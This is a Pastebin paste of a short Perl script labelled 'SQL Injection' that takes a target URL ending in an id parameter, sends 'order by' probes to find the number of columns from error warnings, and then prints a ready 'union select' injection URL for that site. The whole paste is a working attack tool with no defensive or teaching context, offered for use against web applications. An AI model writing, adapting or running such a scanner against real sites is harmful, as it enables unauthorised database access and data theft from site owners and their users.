Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- use LWP::UserAgent;
- print "SQL Injection\n[+] Target \"www.xxx.xxx/index?id=\" = ";
- chomp($target=<STDIN>);
- unless ($target=~/^http:\/\//) {
- $target='http://'.$target;
- }
- $sql="1+order+by+";
- print "[+] Scan column in ",$target,"\n";
- $agent=LWP::UserAgent->new;
- for ($i=1;$i<=50;++$i) {
- print "[] Scan : ",$i-1,"\n";
- $bug=$target.$sql.$i;
- $response=$agent->get($bug);
- $content=$response->content;
- if ($content=~m/Warning/ig) {
- $i-=1;
- $bug=$target.$sql.$i;
- print "[+] Found : ",$bug,"\n";
- $ex=$target."1+and+1=0+union+select+1";
- for ($j=2;$j<=$i;++$j) {
- $ex=$ex.",".$j;
- }
- print "[+] Found : ",$ex;
- exit;
- }
- }
- print "[-] Not Found";
- #http://comfreedom.blogspot.com/2011/02/perl-sql-scan-2.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement